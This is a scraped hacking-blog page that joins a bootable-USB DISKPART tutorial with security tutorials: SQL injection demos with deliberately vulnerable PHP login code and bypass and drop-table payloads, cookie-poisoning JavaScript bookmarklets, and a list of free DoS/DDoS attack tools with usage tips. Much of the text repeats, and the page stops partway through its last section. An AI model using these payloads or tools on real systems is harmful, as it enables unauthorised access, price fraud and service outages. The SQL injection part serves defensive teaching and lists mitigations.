Remove HTML entities from text - Online tool
Enter/paste text with HTML entities to remove them:Escaped text result without HTML entities:
Nvidia releases the next Titan, the GTX Titan Black
Last year, Nvidia hoped to change the graphics card game when it released the GTX Titan, a high-performance, energy efficient card. Now, Nvidia has released an new model of the Titan, the GTX Titan Black.
Defending the Earth from asteroids with high-powered nuclear explosions
Just over a year ago, the Chelyabinsk meteor entered Earth’s atmosphere, streaked across the southern Urals, and detonated in a fireball that was briefly brighter than the sun.
Happiness is a warm iGun: Dumb gun requires smart watch to shoot.
Gun company Armatix hopes to take the smart device industry by storm with its new smart gun system.
Flappy Bird’s removal from the app store: A case for piracy
Flappy Bird’s developer, Dong Nguyen, has broken his radio silence to say that he pulled the game for the sake of your well-being.
Metal Gear Solid
Metal Gear Solid 5 runs at 1080p on PS4, limited to 720p on Xbox One. The PS3, Xbox 360, PS4, and Xbox One will all receive versions of this game, and it seems as if the difference between each console is incredibly stark.
Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts
Wednesday, February 26, 2014
Saturday, February 22, 2014
How to make bootable USB without any software?
This tutorial will help you in creating a bootable USB drive of Windows Vista and 7 which you can use to install Vista and 7 in any system. It might become very useful when you don't have access to DVD drive.
Step 1: Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.
Step 2: Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.
Step 3: When the Command Prompt opens, enter the following command:
DISKPART and hit enter.
LIST DISK and hit enter.
Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.
Step 4: In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.
SELECT DISK 1 (Replace DISK 1 with your disk number)
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Step 7: Copy Windows contents to USB.
You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).
(If in case it doesn't work)
Step 8: Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “F” as my optical (DVD) drive letter and “H” as my USB drive letter.
Step 6: Go back to command prompt and execute the following commands:
F: and hit enter. Where “F” is your DVD drive letter.
CD BOOT and hit enter.
BOOTSECT.EXE/NT60 H:
(Where “H” is your USB drive letter)
if you do not have disk and you want to do this from hard drive of another computer where you have installation stuff then simply change the drive letter to
the one of your hard drive where you have installation stuff
D:\Boot>BOOTSECT.EXE/NT60 H:
D Is the hard drive letter
Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.
Step 1: Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.
Step 2: Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.
Step 3: When the Command Prompt opens, enter the following command:
DISKPART and hit enter.
LIST DISK and hit enter.
Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.
Step 4: In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.
SELECT DISK 1 (Replace DISK 1 with your disk number)
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Step 7: Copy Windows contents to USB.
You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).
(If in case it doesn't work)
Step 8: Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “F” as my optical (DVD) drive letter and “H” as my USB drive letter.
Step 6: Go back to command prompt and execute the following commands:
F: and hit enter. Where “F” is your DVD drive letter.
CD BOOT and hit enter.
BOOTSECT.EXE/NT60 H:
(Where “H” is your USB drive letter)
if you do not have disk and you want to do this from hard drive of another computer where you have installation stuff then simply change the drive letter to
the one of your hard drive where you have installation stuff
D:\Boot>BOOTSECT.EXE/NT60 H:
D Is the hard drive letter
Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.
SQL Injections Attack with Examples
This article explains basics of SQL Injection with an example that shows SQL Injection, and provides methods to prevent from these attacks.
As the name suggests, this attack can be done with SQL queries. Many web developers are unaware of how an attacker can tamper with the SQL queries. SQL-Injection can be done on a web application which doesn’t filter the user inputs properly and trusts whatever the user provides. The idea of SQL injection is to make the application to run undesired SQL queries.
All the examples mentioned in this article are tested with the following:
All the examples mentioned in this article are tested with the following:
- PHP 5.3.3-7
- Apache/2.2.16
- Postgresql 8.4
SQL Injection Example
Most of the web application has a login page. So we will start with that. Let us assume the following code was written by the application.
index.html:
<html>
<head><title>SQL Injection Demo</title></head>
<body onload="document.getElementById('user_name').focus();" >
<form name="login_form" id="login_form" method="post" action="login.php">
<table border=0 align="center" >
<tr>
<td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
</tr>
<tr>
<td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
</tr>
<tr>
<td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
</tr>
<tr>
<td colspan=2 align="center"><input type="submit" value="Login"> </div></td>
</tr>
</table>
</form>
</body>
</html>
When the user enters the user_name and pass_word, it will be posted to login.php via HTTP_POST method.
login.php:
<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test';
$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
/* Error checking the connection string */
if (!$Connect) {
echo "Database Connection Failure";
exit;
}
$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';";
$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
echo "Login Success";
}
else {
echo "Login Failed";
}
?>
The line number 19 in the above code is vulnerable to SQL-Injection (i.e the line that starts with “$query=”SELECT *..”). The SQL query is designed to match the given username and password with the database. It will work properly if the user provides valid username and password. But an attacker can craft the input as follows:
In username field, instead of providing a username the attcker can enter the following.
' or 1=1;--
The attacker than then leave the password field be empty.
When the attacker clicks submit, the details will be posted to login.php. In login.php the query will be framed as follows:
SELECT * from test.members where user_name='' or 1=1;--' and password='';
The above one is a valid SQL query. In postgresql – is the comment character. So the statements after – will be treated as comments and it will not be executed. Now the postgresql will execute
select * from test.members where user_name='' or 1=1;
This will return true and give “Login Success” message.
If the attacker knows the database tables name, then he can even drop those tables by giving the following input in the username field.
';drop table test.lop;--
Some login application, tends to do the following.
- Stored the password as md5 in the database
- First select the username,password from the database based on the username provided.
- Then md5 the password given by the user, and compare it with the password got from database.
- If both are matched, then login is success.
Let’s see how we can bypass that if the query is vulnerable to SQL-Injection.
login.php:
$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";
$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);
# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']);
if(strcmp($user_pass,$row['password'])!=0) {
echo "Login Failed\n";
}
else {
echo "Login Success\n";
}
Now enter the following in the username field
' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70
Enter “123” in the password field and click submit. md5(123) is 202cb962ac59075b964b07152d234b70
Now the query would expand as follows:
SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';
When the above query is executed, the database will return ‘laksh’ as the username and ‘ 202cb962ac59075b964b07152d234b70′ as password.
We also posted “123” in the pass_word field. So the strcmp will return 0 and the authentication will be success.
The above are just couple of examples of SQL injection attacks. There are lot of these variations. Following are some of the things you can do to reduce the possibility of SQL-Injection attacks.
- Strict type checking ( Don’t trust what the user enters )
- If you expect user name to be entered, then validate whether it contains only alpha numerals.
- Escape or filter the special characters and user inputs.
- Use prepared statements to execute the queries.
- Don’t allow multiple queries to be executed on a single statement.
- Don’t leak the database information to the end user by displaying the “syntax errors”, etc.
Cookie Poisoning
Web site cookie poisoning came up twice in the last week while testing so I guess now is great time to talk about how to test the for the vulnerability of cookie poisoning. I'm not going to get into the details of how a cookie works but rather how to poison them. If you want details of how they work from a testing point of view read this respectable paper.
Web sites use cookies (a lot of them), cookies can be permanent (on disk) or temporary (in memory), and cookies contain variables; variables that the site cares about, and can be messed with or "poisoned" to get results that the Web site didn't intend to give you. Use the following test page as an example, The test pages are simple, if you have the right cookie content then you will receive a 50% discount; if the content isn't right then you will not receive the 50% discount. The first page sets the cookie with the content of "SpecialOffer=No" indicating that you are not eligible by default. The cookie setting code on this page is simple and looks like this:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
Now, if you click the link "Click here to see if you are eligible for 50% discount" you'll see that you are not eligible for the discount. The check on the 2nd page is pretty simple too and looks like this:
<SCRIPT>
var pos = document.cookie.indexOf( "SpecialOffer=Yes" );
if( pos == -1 ) {
document.write("I'm sorry you are NOT eligible for the 50% discount");
}
else {
document.write("You are eligible for the 50% discount");
}
</SCRIPT>
In the above script I look for the value of "SpecialOffer=Yes" in the cookie content and then react accordingly. If I don't see "SpecialOffer=Yes" then you aren't eligible for the discount. Now, on to the fun stuff! How do you make yourself eligible for the discount? To do this we need to change the default cookie content value from "SpecialOffer=No" to "SpecialOffer=Yes". How does one change cookie values? There are quite a few ways but I'll share with you my 3 favorites:
1. Add N Edit Cookies FireFox extension
2. Paros Proxy
3. Paste the following JavaScript in the URL bar to view the cookies:
javascript:alert(document.cookie.split(';').join(' \n'))
and the following to modify it:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c=c.substring(1,((c.indexOf("; ")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace (v,nv);document.cookie=n+"="+escape(nc);return unescape (document.cookie);});alert(c(prompt("cookie name:",""), prompt("replace this value:",""),prompt("with::","")));
How to poison cookies with Add N Edit Cookies
1. Navigate to http://www.qainsight.net/examples/cookietest.htm in FireFox
2. Click the cookie icon in your FireFox toolbar
3. Find the cookie for www.QAInsight.net and double click it or highlight it and press the edit button
4. Change the content form field from "No" to "Yes" (case sensitive)
5. Go back to the browser and click the link "Click here to see if you are eligible for 50% discount"
6. KaaaaPOW.... You now have the 50% discount! You're a freakin' evil, bad to the bone tester!
How to poison cookies with Paros Proxy
Typically I wouldn't use Paros in this situation because the cookie is being set on the client side (you won't see this too much in the real world). The following example isn't what I consider cookie poisoning but more JavaScript manipulation. The following assumes you have cleared your cache:
1. Turn on Paros and set you IE connection options to use the address of 127.0.0.1 with a port of 8080
2. In Paros click the "Trap" tab and check the "Trap Request" and "Trap Response" checkboxes
3. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
4. Go back to Paros (Trap tab) and press the "continue" button until you see the following text in the bottom pane:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
5. Change the "No" to "Yes" in the above line
6. Click the "Continue" button.
7. Go back to IE and click the link "Click here to see if you are eligible for 50% discount"
8. Whoot! You now have the 50% discount! You're one sexy cool tester with a severity 1 defect that needs to be submitted.
There are situations where you will want to change the cookie value in the header (the top pane in the trap tab) on the response or the request, this is when you would use Paros over Add n Edit Cookies. Situations where you would need to manipulate the cookie before the response is rendered or before the request is sent due to the server or client side code manipulating the cookie.
How to poison cookies with JavaScript
1. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
2. To view the set cookie, type the following in the URL bar:
javascript:alert(document.cookie.split(';').join(' \n'))
3. You will see "SpecialOffer=No". Click Ok
4. Copy and paste the following JavaScript in the browser URL bar:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c= c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length)); nc=unescape(c).replace(v,nv); document.cookie= n+"="+escape(nc);return unescape(document.cookie);}); alert(c(prompt("cookie name:",""), prompt("replace this value:",""), prompt("with::","")));
5. Hit the enter key
6. Click the Ok button at the JavaScript Alert
7. Type the cookie name of SpecialOffer in the Alert box and click the Ok button
8. At the "replace this value" script prompt type No and press the Ok button
9. At the "with:" script prompt type Yes (case sensitive) and press the Ok button
10. The next alert will show you the replaced cookie. You should see: SpecialOffer=Yes
11. Click the Ok button
12. In IE click the link "Click here to see if you are eligible for 50% discount"
13. DingDingDingDing.... You're a winner! You now have the 50% discount! You're quite the bad-ass tester aren't you? You're like the wicked witch in Snow White but instead of poisoning apples you poison cookies.
And that's how I conduct cookie poisoning when testing. Not too awful tough eh? Oh...if I ever get confused about the state of cookies before and after poisoning I use HTTPWatch to get a better idea of what is going on. I can usually get the gist of it by looking through the cookie and header tabs.
When do you test for the cookie poisoning vulnerability you ask? Whenever there is a cookie being used! Is it a defect if you can manipulate the cookie? Not necessarily. They typically are defects when a cookie is being placed that impacts or restricts the site's behavior and you can exploit that feature. If you manipulate a cookie and it doesn't gain you anything or exploit a feature then it's not of much value, thus not a defect. But...it's important that you know what the cookie you are poisoning does, without knowing what the cookie does you may be poisoning something and may not be seeing that exploit. To prevent guess-work it's easiest if you work with your developer to understand what he/she is doing with cookies on the site so you can go straight for the kill.
Happy poisoning!
Web sites use cookies (a lot of them), cookies can be permanent (on disk) or temporary (in memory), and cookies contain variables; variables that the site cares about, and can be messed with or "poisoned" to get results that the Web site didn't intend to give you. Use the following test page as an example, The test pages are simple, if you have the right cookie content then you will receive a 50% discount; if the content isn't right then you will not receive the 50% discount. The first page sets the cookie with the content of "SpecialOffer=No" indicating that you are not eligible by default. The cookie setting code on this page is simple and looks like this:
document.cookie = "SpecialOffer=No";
</SCRIPT>
var pos = document.cookie.indexOf( "SpecialOffer=Yes" );
if( pos == -1 ) {
document.write("I'm sorry you are NOT eligible for the 50% discount");
}
else {
document.write("You are eligible for the 50% discount");
}
</SCRIPT>
1. Add N Edit Cookies FireFox extension
2. Paros Proxy
3. Paste the following JavaScript in the URL bar to view the cookies:
javascript:alert(document.cookie.split(';').join(' \n'))
and the following to modify it:
1. Navigate to http://www.qainsight.net/examples/cookietest.htm in FireFox
2. Click the cookie icon in your FireFox toolbar
3. Find the cookie for www.QAInsight.net and double click it or highlight it and press the edit button
4. Change the content form field from "No" to "Yes" (case sensitive)
5. Go back to the browser and click the link "Click here to see if you are eligible for 50% discount"
6. KaaaaPOW.... You now have the 50% discount! You're a freakin' evil, bad to the bone tester!
How to poison cookies with Paros Proxy
Typically I wouldn't use Paros in this situation because the cookie is being set on the client side (you won't see this too much in the real world). The following example isn't what I consider cookie poisoning but more JavaScript manipulation. The following assumes you have cleared your cache:
1. Turn on Paros and set you IE connection options to use the address of 127.0.0.1 with a port of 8080
2. In Paros click the "Trap" tab and check the "Trap Request" and "Trap Response" checkboxes
3. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
4. Go back to Paros (Trap tab) and press the "continue" button until you see the following text in the bottom pane:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
5. Change the "No" to "Yes" in the above line
6. Click the "Continue" button.
7. Go back to IE and click the link "Click here to see if you are eligible for 50% discount"
8. Whoot! You now have the 50% discount! You're one sexy cool tester with a severity 1 defect that needs to be submitted.
There are situations where you will want to change the cookie value in the header (the top pane in the trap tab) on the response or the request, this is when you would use Paros over Add n Edit Cookies. Situations where you would need to manipulate the cookie before the response is rendered or before the request is sent due to the server or client side code manipulating the cookie.
How to poison cookies with JavaScript
1. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
2. To view the set cookie, type the following in the URL bar:
javascript:alert(document.cookie.split(';').join(' \n'))
3. You will see "SpecialOffer=No". Click Ok
4. Copy and paste the following JavaScript in the browser URL bar:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c= c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length)); nc=unescape(c).replace(v,nv); document.cookie= n+"="+escape(nc);return unescape(document.cookie);}); alert(c(prompt("cookie name:",""), prompt("replace this value:",""), prompt("with::","")));
5. Hit the enter key
6. Click the Ok button at the JavaScript Alert
7. Type the cookie name of SpecialOffer in the Alert box and click the Ok button
8. At the "replace this value" script prompt type No and press the Ok button
9. At the "with:" script prompt type Yes (case sensitive) and press the Ok button
10. The next alert will show you the replaced cookie. You should see: SpecialOffer=Yes
11. Click the Ok button
12. In IE click the link "Click here to see if you are eligible for 50% discount"
13. DingDingDingDing.... You're a winner! You now have the 50% discount! You're quite the bad-ass tester aren't you? You're like the wicked witch in Snow White but instead of poisoning apples you poison cookies.
And that's how I conduct cookie poisoning when testing. Not too awful tough eh? Oh...if I ever get confused about the state of cookies before and after poisoning I use HTTPWatch to get a better idea of what is going on. I can usually get the gist of it by looking through the cookie and header tabs.
When do you test for the cookie poisoning vulnerability you ask? Whenever there is a cookie being used! Is it a defect if you can manipulate the cookie? Not necessarily. They typically are defects when a cookie is being placed that impacts or restricts the site's behavior and you can exploit that feature. If you manipulate a cookie and it doesn't gain you anything or exploit a feature then it's not of much value, thus not a defect. But...it's important that you know what the cookie you are poisoning does, without knowing what the cookie does you may be poisoning something and may not be seeing that exploit. To prevent guess-work it's easiest if you work with your developer to understand what he/she is doing with cookies on the site so you can go straight for the kill.
Happy poisoning!
Denial-of-Service (DoS) Attack and Free DoS Attacking Tools
The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.
What Is a Denial of Service Attack?
A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.
In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.
DDOS or Distributed Denial of Service Attack
This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.
To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.
In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.
There are basically three types of DDOS attacks:
Application-layer DDOS attack
Protocol DOS attack
Volume-based DDOS attack
Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.
Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.
Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.
There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.
Free DOS Attacking Tools
1. LOIC (Low Orbit Ion Canon)
LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.
It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.
You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.
This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.
The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.
Download LOIC
2. XOIC
XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.
In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.
It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.
Download XOIC
3. HULK (HTTP Unbearable Load King)
HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.
It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.
The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.
Download HULK
4. DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.
This tool is written in C++ and runs on Linux systems.
These are main features of DDOSIM
Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here
Read more about this tool here
5. R-U-Dead-Yet
R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.
Download RUDY
6. Tor’s Hammer
Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.
Download TOR’s Hammer here
7. PyLoris
PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.
Download PyLoris
8. OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.
Download here
9. DAVOSET
DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.
Download DavoSET
10. GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
Download GoldenEye
What Is a Denial of Service Attack?
A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.
In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.
DDOS or Distributed Denial of Service Attack
This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.
To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.
In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.
There are basically three types of DDOS attacks:
Application-layer DDOS attack
Protocol DOS attack
Volume-based DDOS attack
Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.
Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.
Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.
There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.
Free DOS Attacking Tools
1. LOIC (Low Orbit Ion Canon)
LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.
It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.
This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.
The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.
Download LOIC
2. XOIC
XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.
In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.
It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.
Download XOIC
3. HULK (HTTP Unbearable Load King)
HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.
It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.
The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.
Download HULK
4. DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.
This tool is written in C++ and runs on Linux systems.
These are main features of DDOSIM
Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here
Read more about this tool here
5. R-U-Dead-Yet
R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.
Download RUDY
6. Tor’s Hammer
Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.
Download TOR’s Hammer here
7. PyLoris
PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.
Download PyLoris
8. OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.
Download here
9. DAVOSET
DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.
Download DavoSET
10. GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
Download GoldenEye
Common methods to hack a website
The Simple SQL Injection Hack
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Cross site scripting ( XSS ):
Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.
If you wanna know more about Cross-site Scripting, you can view the my other post of Cross-site Scripting with example.
If you wanna know more about Cross-site Scripting, you can view the my other post of Cross-site Scripting with example.
Denial of service ( Ddos attack ):
